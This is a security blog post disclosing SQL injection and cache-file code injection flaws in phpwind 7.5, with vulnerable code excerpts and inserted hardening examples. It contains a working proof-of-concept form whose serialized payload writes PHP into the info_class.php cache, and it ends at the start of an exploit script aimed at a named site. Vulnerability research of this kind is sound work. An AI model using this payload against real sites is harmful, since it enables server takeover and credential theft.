This is all last year's stuff; I kept putting it off, and now it's already February...
A few points first:
1. Although pw's filtering is extremely strict (BT), the injection is not limited to this one point;
2. Use the injection to obtain the system key db_siteownerid; with that there are many ways to get a shell, including the code execution below and an upload to be published later;
3. When I looked at the original pw7.5 last year, saiy had not yet released the vulnerability (so clearly this vulnerability should also have been found by saiy...).
Let's talk about the injection first. It's obviously a dumb spot and looks far less interesting than the code execution; I expect plenty of people already know it. It exists in many versions where the filtering is not strict, and in the sp3 release of pw7.5 you can update any table.
Check the Code:
...
} elseif ($action == 'pcdelimg') {
    InitGP(array('fieldname', 'pctype'));   // column name and category type come straight from the request
    InitGP(array('tid', 'id'), 2);
    if (!$tid || !$id || !$fieldname || !$pctype) {
        echo 'fail';
    }
    $id = (int)$id;
    if ($pctype == 'topic') {
        $tablename = GetTopcitable($id);
    } elseif ($pctype == 'postcate') {
        $tablename = GetPcatetable($id);
    }
    // $fieldname is interpolated unescaped; only $tid goes through pwEscape
    $path = $db->get_value("SELECT $fieldname FROM $tablename WHERE tid=" . pwEscape($tid));
    if (strpos($path, '..') !== false) {
        return false;
    }
    $lastpos = strrpos($path, '/') + 1;
    $s_path = substr($path, 0, $lastpos) . 's_' . substr($path, $lastpos);
    if (!file_exists("$attachpath/$path")) {
        if (pwFtpNew($ftp, $db_ifftp)) {
            $ftp->delete($path);
            $ftp->delete($s_path);
            pwFtpClose($ftp);
        }
    } else {
        P_unlink("$attachdir/$path");
        if (file_exists("$attachdir/$s_path")) {
            P_unlink("$attachdir/$s_path");
        }
    }
    // same unescaped $fieldname again, this time in an UPDATE
    $db->update("UPDATE $tablename SET $fieldname='' WHERE tid=" . pwEscape($tid));
    echo 'success';
    ajax_footer();
}
...
$fieldname is brought straight into the query; enough to make you anxious (Alibaba's kids)... I wrote exps for db_siteownerid and for the administrator's password respectively, but the injection method differs from the one on wooyun.
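For comparison, here is how the pcdelimg branch looks once the two request-controlled identifiers are no longer trusted. This is an added example written for this page, not phpwind's own patch: a column name cannot be escaped with pwEscape, it can only be whitelisted, and the table should come from a fixed map rather than from anything the client sends. The field names, table names and function name below are hypothetical placeholders.

```php
<?php
// Added example (not phpwind code): hardened query construction for pcdelimg.
// Column and table names are identifiers, so they are selected from whitelists;
// tid is cast to int so no payload can survive into the query.

// Hypothetical whitelist of attachment columns this action may clear.
$PCDELIMG_FIELDS = array('attachurl' => true, 'thumburl' => true);

// Hypothetical map from pctype to table; in phpwind the table is resolved
// by GetTopcitable()/GetPcatetable(), which is the same idea: never from input.
$PCDELIMG_TABLES = array('topic' => 'pw_pcfield_topic', 'postcate' => 'pw_pcfield_cate');

/**
 * Returns the SELECT statement for the attachment path, or false when the
 * request names a column or category type that is not on the whitelist.
 */
function pcdelimg_select_query($fieldname, $pctype, $tid, array $fields, array $tables)
{
    if (!isset($fields[$fieldname])) {
        return false;                 // unknown column: reject, do not interpolate
    }
    if (!isset($tables[$pctype])) {
        return false;                 // the original code left $tablename undefined here
    }
    $tid = (int)$tid;                 // numeric parameter: cast instead of escape
    return "SELECT `$fieldname` FROM `{$tables[$pctype]}` WHERE tid=$tid";
}

/**
 * Path returned from the database must stay inside the attachment directory.
 */
function pcdelimg_path_is_safe($path)
{
    return $path !== ''
        && strpos($path, '..') === false
        && $path[0] !== '/'
        && !preg_match('#^[a-z]+:#i', $path);   // no scheme prefix such as ftp: or php:
}

// Constructed sample requests.
var_dump(pcdelimg_select_query('attachurl', 'topic', '12', $PCDELIMG_FIELDS, $PCDELIMG_TABLES));
// string: SELECT `attachurl` FROM `pw_pcfield_topic` WHERE tid=12
var_dump(pcdelimg_select_query('attachurl,(SELECT 1)', 'topic', '12', $PCDELIMG_FIELDS, $PCDELIMG_TABLES));
// bool(false): the column is not whitelisted
var_dump(pcdelimg_path_is_safe('attachment/2011/x.jpg'));   // true
var_dump(pcdelimg_path_is_safe('../../data/config.php'));   // false
```

The point is that escaping functions only protect string literals; the two places this handler is injectable are identifiers, and the only correct control for an identifier is a fixed set of allowed values.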
Next, remote code execution. pw writes its caches everywhere through a single function, pw_var_export, which leaves you almost nothing to work with. However, when writing the cache for the UC application, the key was handled a little carelessly: $class['cid'] is used directly as the array key:
...
function threadscateGory($classdb) { // generates the post exchange category cache
    $classcache = "<?php\r\n\$info_class = array(\r\n";
    foreach ($classdb as $key => $class) {
        !$class['ifshow'] && $class['ifshow'] = 0;
        $flag && $info_class[$class['cid']]['ifshow'] && $class['ifshow'] = 1;
        $class['name'] = str_replace(array('"', "'"), array('&quot;', "\\'"), $class['name']);
        // the key is interpolated raw; only the value goes through pw_var_export
        $classcache .= "$class[cid]=>" . pw_var_export($class) . ",";
    }
    $classcache .= ");?>";
    writeover(D_P . 'data/bbscache/info_class.php', $classcache);
}
...
So you can write executable script straight into the cache, and the shell lands in data/bbscache/info_class.php! No suspense!
Here is last year's poc, from when db_siteid was not required:
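The root cause is that the cache file is PHP source assembled by string concatenation, and one piece of the assembly (the array key) is never quoted or validated. Below is an added example, not phpwind's threadscateGory, showing a cache builder that refuses a non-numeric cid and serializes every value with PHP's own var_export(), so a value like the one in the poc can only ever become a quoted string literal. The function name and the sample records are constructed for this example.

```php
<?php
// Added example (not phpwind code): a cache writer that cannot be turned into
// a shell. cid is validated as an integer key; values are emitted via
// var_export(), which quotes and escapes strings, instead of raw interpolation.

/**
 * Builds the PHP source for an info_class-style cache and returns it as a string.
 * Throws on any record whose cid is not a string of digits.
 */
function build_class_cache(array $classdb)
{
    $out = "<?php\r\n\$info_class = array(\r\n";
    foreach ($classdb as $class) {
        if (!isset($class['cid']) || !preg_match('/^\d+$/', (string)$class['cid'])) {
            throw new InvalidArgumentException('cid must be a non-negative integer');
        }
        $cid = (int)$class['cid'];
        $class['cid'] = $cid;
        $class['ifshow'] = empty($class['ifshow']) ? 0 : 1;
        // var_export() produces a valid PHP literal for the whole record;
        // quotes, backslashes and closing tags inside strings are escaped.
        $out .= $cid . ' => ' . var_export($class, true) . ",\r\n";
    }
    $out .= ");\r\n";
    return $out;
}

// Constructed sample 1: a benign record whose name contains quotes and a close tag.
$good = array(
    array('cid' => '3', 'name' => "Exchange ?> '); phpinfo(); /*", 'ifshow' => 1),
);
echo build_class_cache($good);
// The name is emitted as a single quoted string literal; nothing executes.

// Constructed sample 2: the kind of cid the page's poc relies on is rejected
// before any source text is produced.
$bad = array(array('cid' => '1);phpinfo();/*', 'name' => 'x'));
try {
    build_class_cache($bad);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

If the cache format must be kept, the minimal fix is the same two lines: cast or validate the key, and never let any part of a record reach the file without going through a serializer that quotes it. A useful regression check is to run `php -l` over the generated file in the build pipeline and to alert on any cache file under data/bbscache/ that contains a function call or comment delimiter it should not.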
<form method="post" action="http://127.0.0.1/phpwind/pw_api.php" enctype="multipart/form-data">
Text: <input type="text" name="type" value="uc" size="80"/><br>
Text: <input type="text" name="mode" value="Other" size="80"/><br>
Text: <input type="text" name="method" value="threadscateGory" size="80"/><br>
Text: <textarea name="params">a: 1: {s: 4: "cid"; a: 1: {s: 4: "cid"; a: 1: {s: 3: "cid"; s: 16: "1); phpinfo ();/*" ;}}</textarea><br>
Text: <input type="text" name="sig" value="7a7f6173632485b4c3e6d3671da683a3" size="80"/><br>
<input type="submit" name="submit" value="submit" class="submit"/>
</form>
Here is another, modified version:
Put it in a web directory where php can be executed and access it. If it's an old version that doesn't require siteownerid, submit the parameter type=uc; otherwise you only need to change $db_siteownerid...
<?php
$pwurl = 'http://www.oldjun.com/phpwind';
$db_siteownerid